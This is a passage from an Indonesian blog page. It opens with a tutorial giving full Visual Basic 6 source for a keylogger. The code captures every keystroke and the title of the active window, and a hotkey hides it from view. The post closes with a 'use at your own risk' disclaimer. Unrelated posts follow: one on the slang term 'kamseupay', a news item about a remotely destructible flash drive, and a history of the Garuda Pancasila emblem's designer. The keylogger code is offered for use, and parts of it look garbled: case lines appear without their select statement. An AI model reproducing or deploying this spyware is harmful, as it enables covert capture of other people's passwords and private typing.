4. Tambahkan 1 buah TextBox, 4 buah CommandButton, 2 Timer, dan 6 buah Label (Lihat Gambar)
5. Copas seluruh Code di bawah ini :
Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
Private Declare Function GetForegroundWindow Lib “user32″ () As Long
Private Declare Function GetWindowText Lib “user32″ Alias “GetWindowTextA” (ByVal hWnd As Long, ByVal sWndTitle As String, ByVal cLen As Long) As Long
Private hForegroundWnd As Long
Private backs As BooleanPrivate Sub Command1_Click()
Timer1.Enabled = True
End SubPrivate Sub Command2_Click()
Timer1.Enabled = False
End SubPrivate Sub Command3_Click()
backs = True
End SubPrivate Sub Command4_Click()
backs = False
End SubPrivate Sub Form_Load()
backs = True
End Sub
Private Sub Label1_Click()
End Sub
Private Sub Label4_Click()
End Sub
Private Sub Label6_Click()
Timer1.Enabled = True
End Sub
Private Sub Label7_Click()
Timer1.Enabled = False
End Sub
Private Sub Label8_Click()
backs = True
End Sub
Private Sub Label9_Click()
backs = False
End Sub
Private Sub Text1_Change()
Text1.SelStart = 0
Text1.SelLength = Len(Text1.Text)
End Sub
Private Sub Timer1_Timer()
Dim x, x2, i, t As Integer
Dim win As Long
Dim Title As String * 1000
win = GetForegroundWindow()
If (win = hForegroundWnd) Then
GoTo Keylogger
Else
hForegroundWnd = GetForegroundWindow()
Title = “”
GetWindowText hForegroundWnd, Title, 1000
Select Case Asc(Title)
Case 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95
Text1.Text = Text1.Text & vbCrLf & vbCrLf & “[ " & Title
Text1.Text = Text1.Text & " ]” & vbCrLf
End Select
End If
Exit Sub
Keylogger:
For i = 65 To 90
x = GetAsyncKeyState(i)
x2 = GetAsyncKeyState(16)
If x = -32767 Then
If x2 = -32768 Then
Text1.Text = Text1.Text & Chr(i)
Else: Text1.Text = Text1.Text & Chr(i + 32)
End If
End If
Next
For i = 8 To 222
If i = 65 Then i = 91
x = GetAsyncKeyState(i)
x2 = GetAsyncKeyState(16)
If x = -32767 Then
Case 48
Text1.Text = Text1.Text & IIf(x2 = -32768, “)”, “0″)
Case 49
Text1.Text = Text1.Text & IIf(x2 = -32768, “!”, “1″)
Case 50
Text1.Text = Text1.Text & IIf(x2 = -32768, “@”, “2″)
Case 51
Text1.Text = Text1.Text & IIf(x2 = -32768, “#”, “3″)
Case 52
Text1.Text = Text1.Text & IIf(x2 = -32768, “$”, “4″)
Case 53
Text1.Text = Text1.Text & IIf(x2 = -32768, “%”, “5″)
Case 54
Text1.Text = Text1.Text & IIf(x2 = -32768, “^”, “6″)
Case 55
Text1.Text = Text1.Text & IIf(x2 = -32768, “&”, “7″)
Case 56
Text1.Text = Text1.Text & IIf(x2 = -32768, “*”, “8″)
Case 57
Text1.Text = Text1.Text & IIf(x2 = -32768, “(“, “9″)
Case 112: Text1.Text = Text1.Text & ” F1 “
Case 113: Text1.Text = Text1.Text & ” F2 “
Case 114: Text1.Text = Text1.Text & ” F3 “
Case 115: Text1.Text = Text1.Text & ” F4 “
Case 116: Text1.Text = Text1.Text & ” F5 “
Case 117: Text1.Text = Text1.Text & ” F6 “
Case 118: Text1.Text = Text1.Text & ” F7 “
Case 119: Text1.Text = Text1.Text & ” F8 “
Case 120: Text1.Text = Text1.Text & ” F9 “
Case 121: Text1.Text = Text1.Text & ” F10 “
Case 122: Text1.Text = Text1.Text & ” F11 “
Case 123: Text1.Text = Text1.Text & ” F12 “
Case 8: If backs = True Then If Len(Text1.Text) > 0 Then Text1.Text = Mid(Text1.Text, 1, Len(Text1.Text) – 1)
Case 9: Text1.Text = Text1.Text & ” [ Tab ] “
Case 13: Text1.Text = Text1.Text & vbCrLf
Case 17: Text1.Text = Text1.Text & ” [ Ctrl ]“
Case 18: Text1.Text = Text1.Text & ” [ Alt ] “
Case 19: Text1.Text = Text1.Text & ” [ Pause ] “
Case 20: Text1.Text = Text1.Text & ” [ Capslock ] “
Case 27: Text1.Text = Text1.Text & ” [ Esc ] “
Case 32: Text1.Text = Text1.Text & ” “
Case 33: Text1.Text = Text1.Text & ” [ PageUp ] “
Case 34: Text1.Text = Text1.Text & ” [ PageDown ] “
Case 35: Text1.Text = Text1.Text & ” [ End ] “
Case 36: Text1.Text = Text1.Text & ” [ Home ] “
Case 37: Text1.Text = Text1.Text & ” [ Left ] “
Case 38: Text1.Text = Text1.Text & ” [ Up ] “
Case 39: Text1.Text = Text1.Text & ” [ Right ] “
Case 40: Text1.Text = Text1.Text & ” [ Down ] “
Case 41: Text1.Text = Text1.Text & ” [ Select ] “
Case 44: Text1.Text = Text1.Text & ” [ PrintScreen ] “
Case 45: Text1.Text = Text1.Text & ” [ Insert ] “
Case 46: Text1.Text = Text1.Text & ” [ Del ] “
Case 47: Text1.Text = Text1.Text & ” [ Help ] “
Case 91, 92: Text1.Text = Text1.Text & ” [ Windows ] “
End Select
End If
Next
End Sub
Private Sub Timer2_Timer()
Dim a, b, x As Long
a = GetAsyncKeyState(120)
b = GetAsyncKeyState(121)
x = GetAsyncKeyState(16)
If a = -32767 And x = -32768 Then Me.Hide
If b = -32767 And x = -32768 Then Me.Show
End Sub
6. Jalankan dengan menekan tombol F5
Live demo bisa di download disini :
JANGAN DIGUNAKAN BERLEBIHAN
RESIKO DITANGGUNG SENDIRI
My Profile
Му Лдмє Іѕ Ёяяѳя҆҅҆҅҆҅҆҅҆҅҆҅҆҅҆҅
id: 1693509264
first_name: Khulafaur
last_name: Rasyidin
username: IdhinError
gender: male
locale: id_ID
Biodata Khulafaur Rasyidin
Orang-orang hebat di bidang apapun
Bukan baru bekerja karena mereka terinspirasi,
Namun mereka menjadi terinspirasi
Karena mereka lebih suka bekerja
Mereka tidak menyia-nyiakan waktu untuk menunggu inspirasi.
Rabu, 18 April 2012
Selasa, 17 April 2012
Kamseupay itu apa sih ?
BEGITU kuat pengaruh media internet
dalam dunia hiburan televisi pada khususnya. Belum lama ini sebuah iklan
TV produk provider memopulerkan kembali kata 'kamseupay' yang lebih
dulu populer di dunia maya. Dalam iklan tersebut, seorang remaja di era
ini, terhantui oleh kecupuannya bersikap, sehingga apa-apa yang
ditemuinya menudingnya sebagai si kamseupay. Sebenarnya istilah ini
sudah ada di tahun 60-70-an (menurut yang saya googling).
Saat
itu para remaja mengucapkan kosakata berjenis sindiran itu kepada
seseorang yang dianggap kampungan. Yah, kalau di era kita mah sejenis
dengan 'norak', 'cemen', 'cupu' atau 'culun'. Atau setara juga dengan
yang lebih update: alay, lebay.
Istilah
kamseupay sendiri tidak lain merupakan singkatan dari padanan kata
'kampungan sekali udik payah'. Istilah ini kembali populer setelah
seorang mantan artis, akademisi, sekaligus blogger bernama Marissa Haque
membuat heboh dunia maya dengan tulisan blog dan kicauannya di Twitter.
Saya malas membahasnya lagi karena sudah beropini banyak. Silakan baca
artikel saya Marissa Haque dan Konfliknya di Dunia Maya dan Mari Orgasme Bersama di Dunia Maya untuk mengingatkan atau bagi pembaca yang belum tahu.
Tapi ada hal yang amat menggelitik puting diri
saya kala aksi Marissa ini heboh dibahas para pengguna internet.
Rata-rata menuding Marissa tidak dewasa, pengecut, atau pandangan minor
lainnya. Mereka beropini di ruang publik seperti twitter, facebook, atau
membahasnya khusus di artikel blog. Namun apa yang menggelikan? Mereka
seperti mengecup-ngecup ludah yang dijatuhkan ke tanah. Yeah, mereka
menggunakan kata kamseupay pula dalam interaksi mereka.
Bahkan
seorang blogger dari genre remaja, bereaksi keras menentang Marissa.
Namun tidak berselang beberapa hari, blogger ini menggunakan kata
'kamseupay' dalam postingannya. Contoh lainnya pun bertebaran, ketika
pengguna twitter Indonesia yang rata-rata remaja, juga kerap menggunakan
istilah ini agar mereka update atau sekadar lucu-lucuan.
Ini
membuat saya berpikir kalau Marissa itu dipoyok dilebok (sebagian)
pengguna internet. Merupakan 'istilah' bahasa Sunda yang artinya 'dicaci
tapi dimakan juga'.
Dan
akhirnya kamseupay dipopulerkan oleh sebuah iklan TV. Masyarakat
televisi yang tidak melek interney, tentu bingung dengan kamseupay.
Namun barangkali, golongan orang-orang seumuran Marissa, selintas ingat
akan kata-kata yang akrab di telinga sewaktu masih muda.
*
Sebenarnya
kamseupay ini berkonotasi kasar. Namun karena hanya istilah yang bukan
diadaptasi dari bahasa daerah, maka keberadaannya hanya sebagai bumbu
dari produk budaya pop yang bersifat temporer. Jadi, sebaiknya
beberapa orang tidak gerah mendengarnya. Kecuali kalau yang dipakai
adalah kata-kata sejenis jancok atau kehed.
*
Flashdisk Ini Bisa Diledakkan dari Jarak Jauh
Flashdiskini menggunakan chip memory terenkripsi dan karti SIM. Jika ada informasi sensitif diflashdiskini kemudianflashdiskini hilang atau dicuri, pemiliknya bisa menghancurkannya atau melacaknya dari jarak jauh seperti dilaporkan DM.
Untuk mendapatkannya, pengguna cukup mengeluarkan uang GBP25 (Rp365 ribu) per bulan.
“Pengawasan lokasi dan layanan keamanan data bisa dikirim melalui akses aman pada platform pengawasan kami yang ada di Fujitsu Global Cloud Platform,” tulis perusahaan ini di situsnya.
Tracking
device: The memory stick can be located by GPS and GSM triangulation.
But if that's not good enough, files can be blocked or deleted via
remote control
Killer
blow: If all else fails, users can send a high-voltage charge directly
to the memory stick, frying the internal chip and obliterating all
information on it
Senin, 16 April 2012
Perancang Lambang Garuda Pancasila yang Terlupakan
Dalam tubuhnya mengalir darah Indonesia, Arab –walau pernah diurus ibu asuh berkebangsaan Inggris. Istri beliau seorang perempuan Belanda yang kemudian melahirkan dua anak –keduanya sekarang di Negeri Belanda.
Syarif Abdul Hamid Alkadrie menempuh pendidikan ELS di Sukabumi, Pontianak, Yogyakarta, dan Bandung. HBS di Bandung satu tahun, THS Bandung tidak tamat, kemudian KMA di Breda, Negeri Belanda hingga tamat dan meraih pangkat letnan pada kesatuan tentara Hindia Belanda.
Ketika Jepang mengalahkan Belanda dan sekutunya, pada 10 Maret 1942, ia tertawan dan dibebaskan ketika Jepang menyerah kepada Sekutu dan mendapat kenaikan pangkat menjadi kolonel. Ketika ayahnya mangkat akibat agresi Jepang, pada 29 Oktober 1945 dia diangkat menjadi Sultan Pontianak menggantikan ayahnya dengan gelar Sultan Hamid II. Dalam perjuangan federalisme, Sultan Hamid II memperoleh jabatan penting sebagai wakil Daerah Istimewa Kalimantan Barat (DIKB) berdasarkan konstitusi RIS 1949 dan selalu turut dalam perundingan-perundingan Malino, Denpasar, BFO, BFC, IJC dan KMB di Indonesia dan Belanda.
Sultan Hamid II kemudian memperoleh jabatan Ajudant in Buitenfgewone Dienst bij HN Koningin der Nederlanden, yakni sebuah pangkat tertinggi sebagai asisten ratu Kerajaan Belanda dan orang Indonesia pertama yang memperoleh pangkat tertinggi dalam kemiliteran. Pada 21-22 Desember 1949, beberapa hari setelah diangkat menjadi Menteri Negara Zonder Porto Folio, Westerling yang telah melakukan makar di Tanah Air menawarkan “over commando” kepadanya, namun dia menolak tegas. Karena tahu Westerling adalah gembong APRA. Selanjutnya dia berangkat ke Negeri Belanda, dan pada 2 Januari 1950, sepulangnya dari Negeri Kincir itu dia merasa kecewa atas pengiriman pasukan TNI ke Kalbar – karena tidak mengikutsertakan anak buahnya dari KNIL.
Pada saat yang hampir bersamaan, terjadi peristiwa yang menggegerkan; Westerling menyerbu Bandung pada 23 Januari 1950. Sultan Hamid II tidak setuju dengan tindakan anak buahnya itu, Westerling sempat di marah. Sewaktu Republik Indonesia Serikat dibentuk, dia diangkat menjadi Menteri Negara Zonder Porto Folio dan selama jabatan menteri negara itu ditugaskan Presiden Soekarno merencanakan, merancang dan merumuskan gambar lambang negara. Dari transkrip rekaman dialog Sultan Hamid II dengan Masagung (1974) sewaktu penyerahan file dokumen proses perancangan lambang negara, disebutkan “ide perisai Pancasila” muncul saat Sultan Hamid II sedang merancang lambang negara.
Dia teringat ucapan Presiden Soekarno, bahwa hendaknya lambang negara mencerminkan pandangan hidup bangsa, dasar negara Indonesia, di mana sila-sila dari dasar negara, yaitu Pancasila divisualisasikan dalam lambang negara. Tanggal 10 Januari 1950 dibentuk Panitia Teknis dengan nama Panitia Lencana Negara di bawah koordinator Menteri Negara Zonder Porto Folio Sultan Hamid II dengan susunan panitia teknis M Yamin sebagai ketua, Ki Hajar Dewantoro, M A Pellaupessy, Moh Natsir, dan RM Ng Purbatjaraka sebagai anggota. Panitia ini bertugas menyeleksi usulan rancangan lambang negara untuk dipilih dan diajukan kepada pemerintah. Merujuk keterangan Bung Hatta dalam buku “Bung Hatta Menjawab” untuk melaksanakan Keputusan Sidang Kabinet tersebut Menteri Priyono melaksanakan sayembara. Terpilih dua rancangan lambang negara terbaik, yaitu karya Sultan Hamid II dan karya M Yamin. Pada proses selanjutnya yang diterima pemerintah dan DPR RIS adalah rancangan Sultan Hamid II. Karya M Yamin ditolak karena menyertakan sinar-sinar matahari dan menampakkan pengaruh Jepang. Setelah rancangan terpilih, dialog intensif antara perancang (Sultan Hamid II), Presiden RIS Soekarno dan Perdana Menteri Mohammad Hatta, terus dilakukan untuk keperluan penyempurnaan rancangan itu. Terjadi kesepakatan mereka bertiga, mengganti pita yang dicengkeram Garuda, yang semula adalah pita merah putih menjadi pita putih dengan menambahkan semboyan “Bhineka Tunggal Ika”. Tanggal 8 Februari 1950, rancangan final lambang negara yang dibuat Menteri Negara RIS, Sultan Hamid II diajukan kepada Presiden Soekarno. Rancangan final lambang negara tersebut mendapat masukan dari Partai Masyumi untuk dipertimbangkan, karena adanya keberatan terhadap gambar burung garuda dengan tangan dan bahu manusia yang memegang perisai dan dianggap bersifat mitologis.
Sultan Hamid II kembali mengajukan rancangan gambar lambang negara yang telah disempurnakan berdasarkan aspirasi yang berkembang, sehingga tercipta bentuk Rajawali-Garuda Pancasila. Disingkat Garuda Pancasila. Presiden Soekarno kemudian menyerahkan rancangan tersebut kepada Kabinet RIS melalui Moh Hatta sebagai perdana menteri. AG Pringgodigdo dalam bukunya “Sekitar Pancasila” terbitan Dep Hankam, Pusat Sejarah ABRI menyebutkan, rancangan lambang negara karya Sultan Hamid II akhirnya diresmikan pemakaiannya dalam Sidang Kabinet RIS. Ketika itu gambar bentuk kepala Rajawali Garuda Pancasila masih “gundul” dan “tidak berjambul” seperti bentuk sekarang ini. Inilah karya kebangsaan anak-anak negeri yang diramu dari berbagai aspirasi dan kemudian dirancang oleh seorang anak bangsa, Sultan Hamid II Menteri Negara RIS.
Presiden Soekarno kemudian memperkenalkan untuk pertama kalinya lambang negara itu kepada khalayak umum di Hotel Des Indes Jakarta pada 15 Februari 1950. Penyempurnaan kembali lambang negara itu terus diupayakan. Kepala burung Rajawali Garuda Pancasila yang “gundul” menjadi “berjambul” dilakukan. Bentuk cakar kaki yang mencengkram pita dari semula menghadap ke belakang menjadi menghadap ke depan juga diperbaiki, atas masukan Presiden Soekarno. Tanggal 20 Maret 1950, bentuk final gambar lambang negara yang telah diperbaiki mendapat disposisi Presiden Soekarno, yang kemudian memerintahkan pelukis istana, Dullah, untuk melukis kembali rancangan tersebut sesuai bentuk final rancangan Menteri Negara RIS Sultan Hamid II yang dipergunakan secara resmi sampai saat ini.
Untuk terakhir kalinya, Sultan Hamid II menyelesaikan penyempurnaan bentuk final gambar lambang negara, yaitu dengan menambah skala ukuran dan tata warna gambar lambang negara di mana lukisan otentiknya diserahkan kepada H Masagung, Yayasan Idayu Jakarta pada 18 Juli 1974 Rancangan terakhir inilah yang menjadi lampiran resmi PP No 66 Tahun 1951 berdasarkan pasal 2 Jo Pasal 6 PP No 66 Tahun 1951. Sedangkan Lambang Negara yang ada disposisi Presiden Soekarno dan foto gambar lambang negara yang diserahkan ke Presiden Soekarno pada awal Februari 1950 masih tetap disimpan oleh Kraton Kadriyah Pontianak. Sultan Hamid II wafat pada 30 Maret 1978 di Jakarta dan dimakamkan di pemakaman Keluarga Kesultanan Pontianak di Batulayang.
Turiman SH M.Hum, Dosen Fakultas Hukum Universitas Tanjungpura Pontianak yang mengangkat sejarah hukum lambang negara RI sebagai tesis demi meraih gelar Magister Hukum di Universitas Indonesia, menjelaskan bahwa hasil penelitiannya tersebut bisa membuktikan bahwa Sultan Hamid II adalah perancang lambang negara. “Satu tahun yang melelahkan untuk mengumpulkan semua data. Dari tahun 1998-1999,” akunya. Yayasan Idayu Jakarta, Yayasan Masagung Jakarta, Badan Arsip Nasional, Pusat Sejarah ABRI dan tidak ketinggalan Keluarga Istana Kadariah Pontianak, merupakan tempat-tempat yang paling sering disinggahinya untuk mengumpulkan bahan penulisan tesis yang diberi judul Sejarah Hukum Lambang Negara RI (Suatu Analisis Yuridis Normatif Tentang Pengaturan Lambang Negara dalam Peraturan Perundang-undangan). Di hadapan dewan penguji, Prof Dr M Dimyati Hartono SH dan Prof Dr H Azhary SH dia berhasil mempertahankan tesisnya itu pada hari Rabu 11 Agustus 1999. “Secara hukum, saya bisa membuktikan. Mulai dari sketsa awal hingga sketsa akhir. Garuda Pancasila adalah rancangan Sultan Hamid II,” katanya pasti. Besar harapan masyarakat Kal-Bar dan bangsa Indonesia kepada Presiden RI SBY untuk memperjuangkan karya anak bangsa tersebut, demi pengakuan sejarah, sebagaimana janji beliau ketika berkunjung ke Kal-Bar dihadapan tokoh masyarakat, pemerintah daerah dan anggota DPRD Provinsi Kal-Bar.
Langganan:
Postingan (Atom)
Headline News
Jumlah Pengunjung
Diberdayakan oleh Blogger.